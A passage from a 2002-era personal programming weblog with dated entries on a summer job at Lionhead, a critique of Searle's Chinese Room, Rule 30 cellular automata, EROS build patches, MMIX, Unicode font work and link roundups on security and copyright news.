    			(p1)))))))
    
    (define small-ints '(1 2 3 4 5 6 7 8 9 10))
    
    (define sum (lambda (x)
    	       (let ((a (choose small-ints))
    		     (b (choose small-ints)))
    		  (if (= (+ a b) x) (cons a b) (fail)))))
    
    (display (sum 19))(newline)
    

    This is the entry I forgo...

    This is the entry I forgot to upload last weekend

    Since I'm at home for the weekend you get a links post with some of the stuff over the past couple of weeks. I left my laptop in Guildford so I don't have all the bookmarks I wanted, but here are some:

    Lack of Links

    Well, (setting the scene), I'm sitting in a small hotel room in Guildford on a very comfortable red seat with my laptop on my lap.

    The aforementioned red chair looks a little out of place in the room because, although you could swing a cat in it, it would hit it's head on all the walls. Thus in a room where space is at a premium it seems a little wasteful to put this seat in it.

    But it is a comfy seat. Even compared to the seats at work it's pretty good and that's saying something because the seats at work are special geek seats which cost about £500 and have more nobs and levers than some aircraft flight decks on the underside. (The underside of the chair, not the flight decks).

    I'm also listening to music (I should have mentioned that before). It's music that I found lying about the network at work. I love listening through other people's music sometimes because you can pick out some real gems. Think about the number of different CDs in an average record shop and how few of those you've ever heard. Collaborative filtering is the only way to find any good non-mainstream stuff since radio stations are hopeless. (and the RIAA shutdown all the Internet radio stations).

    At the moment the track is The Strokes - Last Nite (sic). Now The Strokes aren't really very non-mainstream but I don't listen to enough of them anyway.

    However, the last track was cool and by a artist/group called Royksopp, who I've never heard of and that's the fun of it. (There should be two dots above the o in that name, but I'm not feeling brave enough to put a non-Latin1 code point in tonight).

    The night life (for me) is pretty dire here, though. I'm the only person of my age group living in Guildford and working at Lionhead so I can't really go out. (I not really the sort to go out alone and try to hook up with someone). Which is a shame because Guildford is a University town and looks like having a great night life.

    It's not too bad though. I don't get in from work until about 6:45 and by the time I've gone out to fetch dinner and watched some TV it's about 8:00, and I've enough to read.

    And I'm coming home for the weekend. Catching the train at 5:45 and getting in to Cheltenham at 8:30 where father is driving me to a party Have another party on Sunday and I catch the train again at 6:45 Monday morning for work. No rest for the wicked!

    Then I've another two weeks before heading home. Where I have to pick out book prizes, go see people at the Playhouse, get exam results and then fly off to Korea.

    (The school prizes are always in the form of money off books at the book shop in Gloucester. You have to go in and order the books (paying any extra) and then you have to wait 6 weeks to actually get the book at the prize evening. So the trick is to find books that you want - but don't want enough to be bothered about not actually having them for 6 weeks. And they've got to be non-fiction books really.)

    And this year I've got to pick out three (Maths, Biology and Service to the School). Though the books don't have to be related to the subject.

    Since I don't have an internet connection at the hotel I tend to read stuff at work and save any longer stuff on my laptop for later reading. Thus leads to a lack of good links I'm afraid. Do a google search for Markus Kahn though. His homepage at cam.ac.uk is well worth reading.

    I did get that 802.11b connection going, but the access point isn't configured to forward packets unfortunately. The SNMP private community has been changed and it's probably a little rude to reconfigure someone else's AP anyway.

    List Archives

    Assertion: mailing lists which are archived should put the URL for a given message in its header

    If the above where true I could point you at a neat little post on ll1. But it isn't and I cannot look up the URL so you'll have to do without

    Notes to self

    TBL says that a quantum computer can be implimented on a UTM and the quantum bit is just a speed thing. However, there are quantum effects which are non-deterministic and so cannot be done on a UTM.

    TBL also says I should read up on Goldstein randomness. (not sure about the spelling there).

    Eek. Been a long time sin...

    Eek. Been a long time since I've updated this site - been pretty busy. Also, I've forgotton my power converter for my laptop so this entry cannot be too long as I'm draining the last of my laptop batteries

    I've switched hotels and the room is a lot smaller this time. But it's closer to work and there's actaully an 802.11b network here. I don't have the right programs installed (will be apt-getting tomorrow at work) but someone is broadcasting 81 byte packets which seem to be ethernet wrapped in some header that ethereal doesn't understand. They all have the string EDWIN in them as well, for some reason

    Since I don't have connectivity outside work I haven't really been keeping up with stuff so you'll all have to dig up your own interresting links

    (P.S. I still don't have ispell installed - I keep forgetting)

    Well, I dug out the entry...

    Well, I dug out the entry from the html of IV and patched it in. I should be able to upload all this tomorrow at work. I need to install the ispell dictionary though. Unfortunately, I didn't copy my user dictionary off my desktop before I went away - rats.

    Of course, I can't talk about what I'm doing at work - but it's very interresting. I need to do more thinking tonight before prototyping it tomorrow.

    I'm packing at the moment...

    I'm packing at the moment ready for a move to Lionhead for the summer. (Warning: rubbish, Flash web site)

    Old news now, but Cannabis has been down graded to a class C drug. Basically it's now less illegal to possess it, but more so to sell it. I actually think this is a bad thing. Predictably, many are saying the sky will fall because of all the people smoking pot (as they, themselves, smoke their cigars and sip their G&Ts). But this will lead to more money going into the pockets of criminals whose best interests are to try and get people addicted to dangerous drugs (crack, heroine etc). This is going to lead to a backlash and put sensible drugs policy back years.

    Zooko is back!

    A couple of online books I intend to read: Bitter Java and ORA: OCaml [via LtU]

    Shorter, interesting reads: OpenBSD Honeypot [via /.] and How Modern Chemicals May Be Changing Human Biology

    Buffer Overflow in PGP7Ne...

    Buffer Overflow in PGP7

    New M$ DRM patent

    NLP Tricks

    When it rains - it pours. Seems I'm going to be a lot more busy this holiday that I had planned. Connectivity will be patchy at best over the comming days.

    Jon Searle: I Married a Computer

    Yesterday I made the comment that Jon Searle's chapter in "Are We Spiritual Machines?" was rubbish. Here's why:

    Summary
    • Searle uses his old Chinese Room argument (and the same thing in a number of different guises). It's no better an argument now than it has ever been
    • All of Searle's differences between computers and humans can be shown to have no actual fundamental point of distinction
    • I need to know if quantum computers can be simulated on a UTM

    I'm going to run a commentary on Searle's chapter and, in doing this, I'm leaving a lot out of course. You are welcome to read the chapter in full to get the context for these quotes. I purposefully avoided reading Kurzweil's reply.

    Here is the difference: Kasparov was consciously looking at a chessboard, studying the position and trying to figure out his next move. He was also planning his overall strategy and no doubt having peripheral thoughts about earlier matches, the significance of victory and defeat, etc. We can reasonably suppose he had all sorts of unconscious thoughts along the same lines.

    From that I would like to continue a little: Kasparov was studying the consequences of a set of possible moves. His subconscious has filtered most of the illegal moves before his conscious even considers them. The impressive pattern matching ability of his brain is making links with previous games and recalling which moves proved advantageous in those situations.

    Does anything think that is unreasonable? Where is the magical factor in that?

    The computer has a bunch of meaningless symbols that the programmers use to represent the positions of the pieces on the board. It has a bunch of equally meaningless symbols that the programmers use to represent options for possible moves. The computer does not know that the symbols represent chess pieces and chess moves, because it does not know anything. As far as the computer is concerned, the symbols could be used to represent baseball plays or dance steps or numbers or nothing at all.

    Does Searle think that my visual cortex is aware of what chess is when it highlights edges and surfaces? The pattern matching systems of the brain are very general (try staring at clouds or even a blank wall for a while) and certainly aren't designed for processing chess positions. Why is it that symbol processing deserves such contempt?

    I'm sure Searle would argue that there is a conscious kernel of the brain which is somehow `above' the mundane tasks of the brain. So is a child, playing for the first time with a rule book, not really playing chess? The child is doing the same as the computer is, looking at the rules for valid configurations; judging those configurations and then moving. At what point does the child actually start to really play chess?

    Let us call it the Chess Room Argument. Imagine that a man who does not know how to play chess is locked inside a room, and there he is given a set of, to him, meaningless symbols. Unknown to him, these represent positions on a chessboard. He looks up in a book what he is supposed to do, and he passes back more meaningless symbols. We can suppose that if the rule book, i.e., the program, is skillfully written, he will win chess games. People outside the room will say, "This man understands chess, and in fact he is a good chess player because he wins." They will be totally mistaken. The man understands nothing of chess; he is just a computer. And the point of the parable is this: If the man does not understand chess on the basis of running the chess-playing program, neither does any other computer solely on that basis.

    This is the Chinese Room argument (for which, Searle is best known). Usually the man in the room is processing Chinese symbols.

    Again, the fallacy in this argument occurs in two places. Firstly, no neuron in my brain understands anything. If I filled a Chess Room with 1000 people, handling the task as a team, why do you expect any of them to understand it? The understanding is an emergent property of the actions of all the people and the records they are making.

    The second problem is very similar to the one I outlined above. I'm sure this poor man will quickly become quite fast at processing the rules if he spends any reasonable length of time doing it. At some point he may recognise that the data he is handing out look like 2d coordinates and he could draw a grid inside his box to help him keep track with symbols for the pieces. With no previous knowledge of chess he could become quite adapt as his brain starts recognising patterns and caching the results so he doesn't repeat the same calculations. At what point is he really playing chess then?

    Imagine that I, who do not know Chinese, am locked in a room with a computer program for answering written questions, put to me in Chinese, by providing Chinese symbols as answers. If properly programmed I will provide answers indistinguishable from those of native Chinese speakers, but I still do not understand Chinese. And if I don't, neither does any other computer solely on the basis of carrying out the program.

    Reread the reply to the last quote. The faults are the same.

    Kurzweil assures us that Deep Blue was actually thinking. Indeed he suggests that it was doing more thinking than Kasparov. But what was it thinking about? Certainly not about chess, because it had no way of knowing that these symbols represent chess positions. Was it perhaps thinking about numbers? Even that is not true, because it had no way of knowing that the symbols assigned represented numerical values. The symbols in the computer mean nothing at all to the computer. They mean something to us because we have built and programmed the computer so that it can manipulate symbols in a way that is meaningful to us.

    I'm left wondering what, exactly, chess pieces mean to us that makes Deep Blue so fundamentally different. If I were to rename and redesign the pieces (without changing the rules) I'm still playing chess. Now if I number them all and replace them with bits of paper, I have to remember what the numbers mean, but I'm still playing chess. Now if I get rid of the board and imagine all the numbers on a grid in my head, I'm still playing chess. If I don't imagine a grid, but remember the positions also as numbers, I'm still playing chess (but I don't get to use the pattern matching systems of my brain). What's so different between myself and the computer now?

    He confuses the computer simulation of a phenomenon with a duplication or re-creation of that phenomenon. This comes out most obviously in the case of consciousness. Anybody who is seriously considering having his "program and database" downloaded onto some hardware ought to wonder whether or not the resulting hardware is going to be conscious.

    (in this, Searle is talking about downloading yourself into a computer by mapping and simulating your brain - Diaspora style)

    Exactly what is so magical about neurons? Most animals have less advanced myelin sheaths than humans do, and so have slower moving nerve impulses. This small change doesn't disqualify them from Searle's elite club.

    It's unfortunate that all higher animals share the same basic nerve structure, however, as it isn't possible to point to another example. But we have a pretty good understanding of how nerves work, so I can pick a single neuron and replaced it with a device that records incoming impulses and can trigger outgoing impulses. This device communicates via radio to a computer which controls it and simulates the neuron I replaced. (this is just in theory, I'm not saying I could do this today).

    If I continued to replace neuron's with perfect simulations of them I doubt even Searle would suggest that I'm altering anything about my brain functionally. So either I can replace my whole brain that way and simulate it all in the computer (at which point the actual neuron replacing devices can be discarded) or he's suggesting that there is something so special about neurons that they cannot even theoretically be simulated.

    Actual human brains cause consciousness by a series of specific neurobiological processes in the brain. What the computer does is a simulation of these processes, a symbolic model of the processes. But the computer simulation of brain processes that produce consciousness stands to real consciousness as the computer simulation of the stomach processes that produce digestion stands to real digestion. You do not cause digestion by doing a computer simulation of digestion. Nobody thinks that if we had the perfect computer simulation running on the computer, we could stuff a pizza into the computer and it would thereby digest it. It is the same mistake to suppose that when a computer simulates the processes of a conscious brain it is thereby conscious.

    I'm afraid I'm not even going to dignify that analogy with a reply. It's just absurd. Unfortunately for Searle, the absurdity is less hidden in this case than in his arguments above.

    "This thesis says that all problems that a human being can solve can be reduced to a set of algorithms, supporting the idea that machine intelligence and human intelligence are essentially equivalent."
    That definition is simply wrong. The actual thesis comes in different formulations (Church's is different from Turing's, for example), but the basic idea is that any problem that has an algorithmic solution can be solved on a Turing machine, a machine that manipulates only two kinds of symbols, the famous zeroes and ones.

    (The part in italics is Searle quoting Kurzweil)

    In what way is my neural net fundamentally different to a computer? It may well have some impressive emergent features but if you are suggesting (again) that neurons are fundamentally different from a UTM? At this people people usually start muttering the word "quantum" as an answer. Firstly, we have quantum computers anyway and, secondly, I'm pretty sure that a UTM can simulate a quantum computer and that the quantum aspect is just a matter of speed. (can anyone confirm/deny this?).

    The rest of the chapter is just Searle sniping at Kurzweil and he doesn't put forward anything new.

    The conclusion is at the top in the Summary box really. I won't repeat it here.

    Joey has a great tribute to Gene

    Joey has a great tribute to Gene. I actually have no recolection of signing Joey's book, but I'm glad that I've met him unknowingly!

    Crumbs - I'm playing a part in Aaron's dreams

    LiveJournal has become the latest RSS agent. You can now add RSS feeds as friends (for example theregister).

    "This is nothing. In a few years, kids are going to be demanding septal electrodes." Timothy Leary. Hasn't happened yet though Tim. The links at the bottom of the page are highly worth a read.

    Have been reading Jon Searle's chapter in "Are We Spiritual Machines?". It's well written, but just .. wrong. I'm sorry, but his arguments are just rubbish.

    (quick warning, kurzweilai.net is a pile of crap in terms of presentation, but the content is good)

    It seems that Gene shot h...

    It seems that Gene shot himself

    Dubya losing the benefit of the doubt from the National Post (Canadian) [via Keith]. He still has a 70% approval rating though.

    Notes on Fitz. Still vapourware at the moment but with people like Raph involved, it could be quite something.

    The detailed designs of the MS TCP/IP stack [via coderman]. It has a little market-droid speak in it at times ("strategic enterprise network transport for its platforms" <- bullshit alert), but it has enough real content to be worth a skim. A recent traffic sniff of a root DNS server showed that Dynamic DNS requests to alter the root (from MS's screwed up implimentation) made up a significant fraction of the traffic.

    Pretty graphs. It's sites like these that make 56K users feel it.

    The person with the file:///dev/null turns out to be Ian Hill:

    In ELinks you can set a fixed referer in the options menu. In fact it tries its best to stop you sending *real* referers by flagging that option as "Default - Insecure" It also lets you have no Referer: at all!.

    ELinks is a modified version of Links which does SSL (apparently, I can't test it though as it wont use a proxy).

    I'm pretty sure that standard Links does SSL too, but it doesn't have the Referer thing. Finially a brower which actually follows that obscure bit of the RFC

    Paul Graham assures me (via email) that stuff is still happening to Arc (his new Lisp). Unfortunately the code seems to be non-public at the moment.

    Channel 4 haven't been showing reruns of Ally McBeal in the afternoons this week so I'm going to have to watch the deaded new series tonight.

    Wired has a piece on Gene's death...

    Wired has a piece on Gene's death. They suggest it's suicide too.

    I pulled my comment that I suspected suicide when the Washington Post text came out and the family said it was an accident. Maybe the family think there's something shameful in it? I'm saddened.

    Salvia - not for the conservatives in our readership.

    Zooko's mail is still mounting up (165 messages now) and the logs are filled with the retries. I've made Zooko a local on metis now - I'll send him the mbox when he's alive again. Unfortunately, since qmail has queued the other 165 as remote it won't deliver them locally. I guess I could point zooko.com to metis in /etc/hosts but I don't want to play about like that. Hopefully Zooko is home soon.

    Airhook looks very cool (read the page for the links at least). It's a TCP replacement protocol with a number of advantages and it can be used as a library using UDP.

    Are capital letters in URLs considered harmful? I have a couple of failed attempts to access the Hitch Hikers text with the wrong capitalisation. Do some things assume lower case?

    A quick congrats to the person with a referer of file:///dev/null (email me!). You are going to send the deep-link protection sites nuts with that!. Although the HTTP 1.1 spec says browsers SHOULD provide a way to disable sending Referer headers, I don't know of any that do. Personally I use privoxy which sets the Referer header to match the host name (for crappy anti-deep-link sites).

    I guess that makes me hypocritical since I love reading the weird searches that turn up IV!

    MMIX

    Zooko has been away for ages and his mail server is down. Since IV is the backup MX the queue has been filling for a while and it's now at 101 messages and counting. I've just upped the queue lifetime to 2 weeks to make sure they don't die, but still no sign of Zooko

    Full book: "Are We Spiritual Machines?" posted by Kurzweil. Also available in dead-tree format.

    An old (1993) talk by Vernor Vinge about the Infosingularity.

    When Knuth wrote the Art of Computer Programming he used a fictional assembly language to do the examples in, called MIX. Well, MMIX - the 64-bit updated version of MIX - has been around for a while. You can get the documentation here

    Well, someone has ported GCC to MMIX and it works pretty well. Grab the latest GCC 3.1 and binutils 2.12.1 and build gcc with the --target=mmix option to configure and it all goes swimmingly.

    Not sure why you would want to do this, but it works

    # 1 "test.c"
    ! mmixal:= 8H LOC Data_Section
    	.text ! mmixal:= 9H LOC 8B
    	.p2align 2
    	LOC @+(4-@)&3
    	.global main
    main	IS @
    	SUBU $254,$254,8
    	STOU $253,$254,0
    	ADDU $253,$254,8
    	LDOU $253,$254,0
    	INCL $254,8
    	POP 0,0
    
    	.data ! mmixal:= 8H LOC 9B
    	
    Problem class 50

    I think I need some simple project to code on. Either helping with an existing one or something nice and short term that I can see the end of. (or someone could give me a real job - heh, yea right).

    All my ideas are far too far out and I keep cycling. At one point I'm thinking that I'm nuts and will never manage any of what I'm planning so I cut the plan down hugely. Then I start thinking and designing and pretty soon I'm right back to where I started, by a different path.

    This is getting really annoying because, by the time I'm at to the `cut it all back' point I'm planning a Turing-capable AI.

    Landscape (there is a page for Landscape in the sitetree - but it sucks) mearly involves:

    • Implimenting a dynamically typed, safe language which is incrementally compiled at almost every key stroke with a GUI which highlights errors at you type them and can construct proofs of the code, on-the-fly
    • Building a virtual machine for the language to target which maps the disk as a huge single-level store (SLS) of persistant objects which have an `in memory' format (EROS style).
    • (this VM (which is a MMIX machine, by the way) is capable of running programs backwards for debugging with the aide of a store journal. This, of course, ties in perfectly with the language GUI)
    • Ripping out everything, to the level of replacing the consoles etc, with code written for the VM, which all runs as a single process (it's a safe-language, remember?) and can access the SLS
    • The SLS contains Xanadu style, super linked objects of everything and code is just another object. Basically a fully object orientated system where, say, an email object would have From links to a Person object, which would have links to all the emails from and to that person, thier PGP key etc

    And that's a sane idea by my standards!

    Oh crap

    Gene Kan has died. I feel...

    Gene Kan has died. I feel a little ashamed for missing it, but everyone seems to have. I'm sorry Gene.

    [link1] [link2] [link3] [link4] [link5]

    Still no solid word on how such a young and healthy guy passed away.

    Update: added a fifth link, which says it was an accident

    Evas2

    Quoted in another New Scientist article. This one doesn't link to IV unfortunately.

    Very good text on the up and comming 64-bit chips: POWER4 and Itanium2. (the author discounts Hammer, which is a shame because I like it from what I've heard)

    Seth Schoen has more notes on Palladium. [via Wes]

    Seems the Earth will expire by 2050. I wonder if we hit info-singularity before we all die out?

    RAVE Act: Reducing Americans' Vulnerability to Ecstasy. Sometimes I plain just don't get the USA. I guess a whole multitude of factors just increases the wanker/square meter count there.

    Seems that all the new Evas work is going into evas2, which rasterman pointed me to. My UTF8 support is already in there . (and it means I don't have to patch Imlib now)

    Evas2 seems to be a lot cleaner code but it's not as mature at the moment. For one, deleted objects don't actually disappear, which makes for some interesting effects to be sure. The API naming is a lot cleaner thou, it now has consistent noun-verb style everywhere.

    Raster asked why his Japanese ttfs didn't work with UTF8. It seems that they map their characters into the Latin-1 region rather than their Unicode regions. I have no idea why. I suppose there must be some old encoding which they are using for when everything was ASCII.

    JWZ's calendar

    JWZ was asking how to fix the sidebar in his calendar (read the LJ post for the full specs). I suggested that he could hide CSS from NS4 and IE3 by putting it in a @media screen block - which works really nicely.

    Except that in order for NS4 to render it correctly you have to put the fixed sidebar in a table. This breaks konqueror unfortunately, which doesn't render the sidebar at all. Damm NS4

    IOI

    Janis Ian on music copyright. Nope, I've never heard of her either but it's a good text (even if it is preaching the choir here).

    Sunshine Project on biological weapons.

    IRC chat with Ray Kurzweil and Venor Vinge.

    I have dates for flying to S. Korea now (16th and 25th of August) so I ambled down to my GP today for any injections that I need. Seems I only need Hep A and the needle wasn't too bad. (I don't like needles).

    (yes, Ian (if you read this) that means I can't make your party - sorry!)

    Also Lionhead, the sponsors of the UK IOI team, have offered me a job for the summer. I kindof wanted to stay around this year, but since my other job prospects are somewhat, erm, crap, I might take it up.

    TrueType fonts

    Added UTF8 support to Evas today. (Evas is the Enlightenment canvas). Unfortunately the ALPHA_SOFTWARE backend uses Imlib to render text, so I have to add UTF8 support to that too.

    Thankfully, the M$ core fonts (one of the few good things ever to come out of That Company) have a Unicode table in them. Wrote ttfdump to display the code points in a given font and some of the M$ fonts have a scattering of U2200 glyphs (the maths symbols). Unfortunately, Wolfram's maths fonts put all the glyphs in the private use area, prat.

    Searching Gnutella networks

    Bram flames Ted Nelson

    Emacs mode for M$ Word

    Will Knight pointed me to this paper on searching Gnutella networks. Some commentry:

    The motivation for this metric is that in P2P systems, the most notable overhead tends to be the processing loadthat the network imposes on each participant.

    The processing load is their most notable overhead? They must have one hell of a bandwidth or be really bad coders.

    If a PC has to handle many network interrupts when it joins the P2P network, the user will be forced to take the PC off the P2P network to get "real" work done.

    Because of interrupt load? I'm wondering if this paper has been translated from another language. Once again, the limiting factor is bandwidth and certainly not interrupts.

    Other than that odd misunderstanding the rest of the paper is very good. Some points:

    • Walkers don't find uncommon documents

    Unstructured networks fail to find uncommon documents generally, but walkers are very bad at it. Consider a million node network where a document only exists on one node. With 64 walkers, state keeping and an average of 1 second for a hop, you are looking at over 4 hours search time.

    Not to mention that the suggested `talk back' limit of once per 4 hops would generate 16 packets a second to the searcher; enough to take up a notable chunk of a modem's bandwidth.

    • Reason why random placements are better

    The paper also suggests random replication without considering why. I would hazard a guess of the following:

    Random walkers are going to tend to end up at the well connected nodes in a power-law network and hang around there. Thus path replication will hit the high order nodes which random replication (as they define it) will tend to hitmore low order nodes. I would suspect that measuring the number of copies in the network would show that random replication gives the highest number.

    • Random networks don't work

    The paper also suggests that networks should be random. This is very nice but not all nodes are created equal and those on a T1 line can handle more messages per second than modem users. This bandwidth inequality (and the distribution of bandwidth) will force a power-law network to some extent.

    • It's not anonymous

    Well documented, but I'm just pointing it out.

    Greedy people scheme:limi...

    Greedy people scheme:
    limit freedoms for profit.
    Resistance prepares.

    Orwell on the decay of the English language. Still relevant, if not more so.

    MI5: "Civil liberties are a Communist front" (1951)

    Starting reading through JWZ's rants last night while waiting for CSI to come on. About 2/3 of the way down now

    EuroPython presentations ...

    EuroPython presentations [via Lambda]

    Note on Coding Theory [via Raph]

    e-lang has a great thread...

    e-lang has a great thread on TCPA/Palladium. See, for example, this message.

    I would quite like to switch to using EROS but I'm too lazy really. I have a spare 20GB IDE drive bolted into my case which isn't even powered at the moment. Maybe I should download it and give it a go.

    Building EROS

    Ryan Lacky has written a long post about TCPA to the cypherpunks list. Ryan:

    This feels rather unfulfilling. I even avoided posting it to other lists so as to limit the spread of crack and confine said crack to its standard resting place.

EROS doesn't exactly build cleanly and I don't know if my fixes break anything critial yet, but they do get the code to compile at least

(the EROS install page is here)

Patch One

--- Makefile	Wed Jul  4 19:15:29 2001
+++ Makefile	Sun Jun 30 18:36:31 2002
@@ -103,7 +103,8 @@
 XENV_LIBXML2 =  libxml2-2.3.13
 XENV_LIBXSLT =  libxslt-0.13.0
 
-XENV_TOOLS = xenv-make xenv-binutils xenv-gcc xenv-libxml2 xenv-libxslt
+#XENV_TOOLS = xenv-make xenv-binutils xenv-gcc xenv-libxml2 xenv-libxslt
+XENV_TOOLS = xenv-binutils xenv-gcc xenv-libxml2 xenv-libxslt
 
 xenv: $(XENV_TOOLS)
 
@@ -120,12 +121,6 @@
 	-rm -rf build
 
 xenv-binutils:
-	-rm -rf build
-	-mkdir build
-	cat pieces/$(XENV_BINUTILS)/tgz-part.* | $(ZCAT) - | (cd build; tar xf -)
-	(cd build/$(XENV_BINUTILS); ./configure \
-			--prefix=$(EROS_XENV) \
-			--target=$(EROS_TARGET)-unknown-linux)
 	$(MAKE) -C build/$(XENV_BINUTILS) all install
 	@echo
 	@echo "BUILD SUCCEEDED... removing build subdir"

Patch Two

--- bfd.h	Sun Jun 30 19:16:33 2002
+++ bfd.h	Sun Jun 30 19:16:21 2002
@@ -98,7 +98,7 @@
 #define TRUE_FALSE_ALREADY_DEFINED
 #endif /* MPW */
 #ifndef TRUE_FALSE_ALREADY_DEFINED
-typedef enum bfd_boolean {false, true} boolean;
+typedef enum bfd_boolean {FALSE, TRUE} boolean;
 #define BFD_TRUE_FALSE
 #else
 /* Use enum names that will appear nowhere else.  */

Final exam finished this ...

Final exam finished this afternoon. Hung up my blazer for the last time. This feels weird.

On the upside looks like I'm a tech reviewer for the new edition of UNIX Power Tools.

Gun crime up 49% and this...

Gun crime up 49% and this is since we banned handguns. I'm sure ESR would have something pro-gun to say about this, I'm not going to.

Those CA results are rubbish past 8 bits. It was a 1 char typo in the code which I'm happy about because they make sense now. Maybe some more analysis soon

Been working on a secure version of GRUB which keeps checksums on a write protected floppy and won't boot a trojan kernel. It will also check any number of other files before booting (say /sbin/init and friends). Working pretty well

Ian Hill gets a submission on /.

Metis (this box) got a nice update over the last couple of days. Switched from apache to publicfile on the internal interface, bind to tinydns for the DNS server and installed gr

A NewScientist story linked to imperialviolet.org . Thanks Will. (Will Knight is one of only 2 clueful journalists I've ever talked to. The other being Andrew from theregister).

Rule 30

I'm troubled

Thinking about the CA results from yesterday I'm pretty convinced that I'm doing something silly. I verified the results for 3 bits by hand and it all came out right. But still, it makes a mess of my thinking and I want those results to be wrong.

I'll go over the code again at some point

OpenSSH

Wes doesn't like the way Theo is handling the latest OpenSSH bug. What would you do different Wes?

If Theo says "here's the fix" it's then a rush between sysadmins and blackhats as to which get to a host first. sshd cannot be chrooted or run as non-root so all cracks are total and you're looking at a reinstall. Privsep isn't really ready for the prime-time but it does make people mostly immune without revealing the bug (thou with the added focus people won't be long in finding it independantly). It's a bad situation, but Theo is handling it well

SSH Remote Exploit. All u...

SSH Remote Exploit. All upgrade to OpenSSH 3.3 (see this for Debian)

Maximum of 44 outputs for CA's upto 27 bits now confirmed. (which means that 25 and 27 have 44 outputs since the number cannot go down). I don't expect to finish processing 29. I don't think the answer would be a shock anyway.

IBM laptops get TCPA chips. Now the chip actually sounds a little useful:

The chips, known as Trusted Platform Modules, generally include a 16-bit microprocessor, a random number generator, hashing capabilities and a significant amount of non-volatile memory. Among the security features TPMs provide are an ability to generate and securely store digital certificates and private keys on-chip, hardware support for multiple authentication schemes and the encryption/decryption of files on demand.

If they weren't fuckware chips it could be a good thing. As it is...

Forgot to upload Gilmore's essay. Fixed.

More on Rule 30

Been playing about with Rule 30 CAs (see ANKOS page 53). You might want to read Sunday's post first (if you have not already).

As I said, Rule 30 CA seems to map very regular numbers onto odd sequence numbers. The lack of type A randomness in the input number and the presence of it in the output data, gives rise to seeming `added complexity'.

Today I'm taking a look at that mapping.

The input to the CA is the starting line expressed as a number. A black block is a 1, white is 0. The input size is always odd. The output is the first n bits down the centerline (not including the bit from the starting line). For example

A Rule 30 CA

That is a size 3 CA with starting value 6 (101 in binary). The centerline is down the middle (the white column) and the result is 1 (001 in binary).

Now we can cycle through all the possible input values for a given size and record the output. Rather than give a huge table I've taken a tally count of the outputs and plotted output value against count

Results from 5 bits Results from a rule 30 run with 5 bits of input

Results from 7 bits Results from a rule 30 run with 7 bits of input

Results from 9 bits Results from a rule 30 run with 9 bits of input

Results from 15 bits Results from a rule 30 run with 15 bits of input

We can certainly see that the mapping is not one way. In fact there are very few possible output values and all the inputs map to a small number of possible outputs. The maximum count in each case is 2^{n-3} + 2^{n-2} (where n is the size of the input in bits).

The number of different outputs is also noteworthy. It has a maximum of 44 upto 23 bits of input. (of course it gets quite time consuming to run tests with greater than 23 bits of input).

Size of input (x) vs number of different outputs Graph of the number of output values for a variable input size

I don't have any conclusions at the moment, but at least I would be worried about using Rule 30 CAs as random number generators given that all the seeds seem to map to (at most) 44 sequences

Cool! I'm on Ryan's LJ fr...

Cool! I'm on Ryan's LJ friends list. Now if only he posted weird and wonderful stuff in friends only posts

A few more scans from the prom. (photos from weezel)

toad.com is dead so I've posted a local copy of John Gilmore's great essay "What's wrong with copy protection" since some people might need the anti-memes for this

Given the price of flights to LV I'm not going to make DefCon 10 this year. I might well go down to the UKUUG exhibition though. Anyone want to meet up? Mail me.

Wolfram and Randomness

Some thoughts on randomness, not structured yet...

DefineCryptographic Randomness(type A)The lack of patterns in a sequence
Chaitin Randomness(type B)The inability to express a sequence in a short program

You may wish to read up on the latter

Now, sequences that are type A are used all the time, most explictly in cryptography. If I run an RC4 cipher with a random key I can generate megabytes of data will pass type A tests. However, you can certainly code RC4 in less than a megabyte of data on a resonable UTM. And even if you couldn't do it in less than a meg you can just generate more RC4 data. Thus my type A random sequence is not very type B.

Now sequences that aren't type A random almost certainly aren't type B. I don't have anything like a proof for this yet, but it seems sensible. However, I don't think you can ever prove that you have the shortest program that will generate a given sequence without brute-forcing all programs upto that length. I think the proof for that is in this paper, but I need to reread that as I haven't looked at it for ages

So, given the set of all sequences of length n some will be type A and some of those will be type B random (both of those lines are fuzzy, but I don't think that right now matters). Assuming you can find the shortest program that generates each of those sequences you can reinterpret each of those programs as numbers and give each member of the set a number (and thus an order). Some sequences will have shorter numbers than others and if we generated everyu possible program in length order we would expect to see outputs in roughly the same order as our ordered set.

Now, this is where Wolfram's sequences come in. Mathamatica's random function actually runs a rule 30 CA and uses the values of the center line as random data. This gives type A randomness (so he says). However, what he's calling complexity in ANKOS is type A randomness and `his' (pompous twit) `complexity generating' CAs are simply low numbered members of the set of sequences.

Like I said, that was just me writing stuff down to see what I'm thinking

Back to our regular schedule

I wonder if we can expect some really fat, high profile, Americans to be defined as enemy combatants and detained without trail now?

Another just links day, t...

Another just links day, though I'm kindof free of exams now

Oh look, linking to this site without permission is prohibited. Oh well - kiss my arse. Wired article (which links to NPR, so is that link banned too?)

Links today today because...

Links today today because I'm feeling a little shot (and it's only going to get worse). I have some ideas about Wolfram/cryptographic randomness/chatin randomness which are starting to come into focus but I'm not sure if there's actually anything there yet

I had to write about Creationism today in GS exam (that page could have been useful yesterday - oh well). My hand hurts now after 3 hours of writing. I'm a maths person, I don't do lots of writing! (On the upside I found that I have pretty funky capital letters)

We Win!

We Win! [and the Guardian]

This looks like it might be interesting (read the press release)

Good text on refuting Creationism crap from SciAm. SciAm was one of the offenders who broke links when I checked, but given the URL of this page I'm hoping it's a little more permanent.

Been checking the old arc...

Been checking the old archive pages with the W3C link checker. Not too bad, thou it seems that Dilbert and SciAm break their links after a while. It also tells you when you've missed a / on the end of a URL which saves a redirect at least.

The RIPX delay made it on the number two slot on PM (the news show on Radio 4, if you're not British don't worry). That's coverage.

Someone emailed me about Xchat code, which I haven't touched in ages. Seems someone was a little `feature optimistic' with the documentation and so I wrote a patch to bring the code up to what the documented behaviour was. It's weird reading code that I wrote years ago, but it actually made a lot of sense. Reminded me of how much C sucks for a lot of stuff, but at least the code wasn't as bad as I thought it was going to be, considering I must have been about 15 then.

Well, there's a Backlink ...

Well, there's a Backlink of the Day bar now. It's not really `of the day' as such - I grep them out of the logs by hand but it will do for the moment. Coincidentally, Keith is talking about implimenting backlinks as well today.

The two Google links above show one of the problems at the moment. In one case Google is linking to the text of Fear and Loathing which is fine because that's on a static page. However, the other is linking to a blog entry on the front page which long ago fell off the bottom.

In the Google case you can view the cached version of the IV frontpage, but in the general case the Referer header generated from people clicking links of the frontpage will be http://imperialviolet.org, not http://imperialviolet.org/page4.html#e72. We need some way to tell the browser what the source of a link should be.

